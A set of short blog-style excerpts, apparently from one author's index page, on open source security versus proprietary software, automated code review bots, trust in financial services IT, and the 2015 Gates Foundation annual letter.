At one point in time I worked for an organization that banned the use of open source software. They were concerned that in the event of issues “there would be no support”. At the time they believed that commercial software from companies like IBM, Oracle, Microsoft and SAP was “safer” because there was a commercial entity that stood behind the products they sold and provided support.
Now that’s changing
Most technology leadership today recognizes that proprietary software is not safer than open source software. Basic metrics around the number of disclosed vulnerabilities and “time to patch availability” seem to give an edge to open source software at least being patched faster. Not only that but you have the option to inspect the code yourself, and patch it yourself - options that are simply not available with commercial, closed software. This causes a re-evaluation of the relationship of proprietary, commercial software to operating a safe and secure business.
Ask a programmer to review 10 lines of code, they’ll make 10 suggestions. Ask them to review 1,000 lines of code and they’ll say “it looks good!”
Many people have begun integrating bots into the GitHub ecosystem for code review. For example the folks who created the Bootstrap UI framework created a bot called rorshach to perform sanity checks on pull requests. If the sanity check fails it leaves a nice informative comment, explaining the issue and how to fix it.
There is another example at BetterDiff. The idea there is that instead of having humans go through and give cursory reviews, you have a round of automated review by bots (using normal, industry-standard tooling) and it comments on the pull request just like a reviewer would.
Pretty soon I expect to see “when tests pass, and code reviews pass, then go ahead and merge the code” bots.
Welcome to the future.
Q: Is it secure?
A: No it is not. Security is never binary.
Q: OK, how secure is it?
A: It seems like you just asked that question.
Q: No, the first question was if it’s secure, the second question was how secure is it.
A: Well now that wasn’t even a question at all.
Financial services companies are among the most highly regulated industries in the world. They also suffer from a trust issue. Trust is a key ingredient in making a financial services business viable. Why would I ever buy insurance, banking services or invest my savings via a company that I didn’t trust?
After the sub-prime debt crisis in 2008 it became clear that the financial services industry would need to rebuild it’s image. Companies would need to zealously rebuild their brands to aspire to become “trusted advisors”. From an IT standpoint it is crystal clear that client and corporate data must be guarded and protected to prevent any loss as well as minimize the potential for damage to an organization’s reputation. How to manage the risk and yet stay innovative?
The Bill and Melinda Gates Foundation just released it’s annual letter. I have come to look forward to these letters because I find them incredibly inspiring. This year instead of an annual update they are re-baselining and taking a fifteen year view of the future. As I read this year’s letter I was simultaneously moved, inspired and awed by the scope their mission:
The lives of people in poor countries will improve faster in the next 15 years than at any other time in history. And their lives will improve more than anyone else’s.
- 2015 Gates Annual Letter